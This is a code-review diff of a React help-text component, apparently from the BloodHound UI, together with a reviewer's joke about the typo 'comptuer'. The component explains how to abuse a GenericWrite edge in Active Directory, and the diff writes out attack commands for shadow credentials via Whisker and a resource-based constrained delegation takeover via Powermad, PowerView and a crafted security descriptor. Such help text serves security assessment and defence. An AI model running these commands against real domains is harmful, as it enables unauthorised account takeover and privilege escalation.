packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx

```diff
@@ -130,58 +160,96 @@ const WindowsAbuse: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetType })
+                    </Typography>
+
+                    <Typography component={'pre'}>{'Whisker.exe add /target:<TargetPrincipal>'}</Typography>
+
+                    <Typography variant='body2'>
+                        For other optional parameters, view the Whisker documentation.
+                    </Typography>
+
+                    <Typography variant='body1'> Resource-Based Constrained Delegation attack </Typography>
+
+                    <Typography variant='body2'>
+                        Abusing this primitive is possible through the Rubeus project.
+                    </Typography>
+
                     <Typography variant='body2'>
                         First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad
                         project can be used to add a new attacker-controlled computer account:
                     </Typography>
+
                     <Typography component={'pre'}>
                         {
                             "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)"
                         }
                     </Typography>
+
                     <Typography variant='body2'>
                         PowerView can be used to then retrieve the security identifier (SID) of the newly created
                         computer account:
                     </Typography>
+
                     <Typography component={'pre'}>
-                        {
-                            '$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid'
-                        }
+                        $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand
+                        objectsid
                     </Typography>
+
                     <Typography variant='body2'>
                         We now need to build a generic ACE with the attacker-added computer SID as the principal, and
                         get the binary bytes for the new DACL/ACE:
                     </Typography>
+
                     <Typography component={'pre'}>
-                        {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"' +
+                        {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' +
                             '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' +
                             '$SD.GetBinaryForm($SDBytes, 0)'}
                     </Typography>
+
                     <Typography variant='body2'>
                         Next, we need to set this newly created security descriptor in the
                         msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again
```

Comment:
Should this be computer? Or is comptuer the french computer 😉

Reply:
Merci beaucoup monsieur 👌